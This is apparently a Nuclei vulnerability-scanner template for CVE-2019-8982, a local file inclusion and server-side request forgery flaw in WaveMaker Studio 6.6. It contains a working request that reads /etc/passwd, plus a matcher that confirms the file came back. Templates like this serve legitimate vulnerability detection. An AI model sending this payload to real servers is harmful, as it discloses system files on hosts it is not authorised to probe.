44 lines
1.5 KiB
YAML
44 lines
1.5 KiB
YAML
id: CVE-2019-8982
|
|
|
|
info:
|
|
name: Wavemaker Studio 6.6 - Local File Inclusion/Server-Side Request Forgery
|
|
author: madrobot
|
|
severity: critical
|
|
description: "WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent&inUrl= value in com/wavemaker/studio/StudioService.java, leading to disclosure of local files and server-side request forgery."
|
|
remediation: |
|
|
Apply the latest security patches and updates provided by Wavemaker Studio to mitigate these vulnerabilities.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/45158
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-8982
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
|
|
cvss-score: 9.6
|
|
cve-id: CVE-2019-8982
|
|
cwe-id: CWE-918
|
|
epss-score: 0.02146
|
|
epss-percentile: 0.88074
|
|
cpe: cpe:2.3:a:wavemaker:wavemarker_studio:6.6:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: wavemaker
|
|
product: wavemarker_studio
|
|
tags: cve,cve2019,wavemaker,lfi,ssrf,edb
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a004730450220141372774b8d0b323563a66b16e68c5ff8f80d3b9a1394a451b5583ca2390a0002210090858d871effc9634c015dfbf763e3dc54b0c5978ab84831cb24168205e03690:922c64590222798bb761d5b6d8e72950
|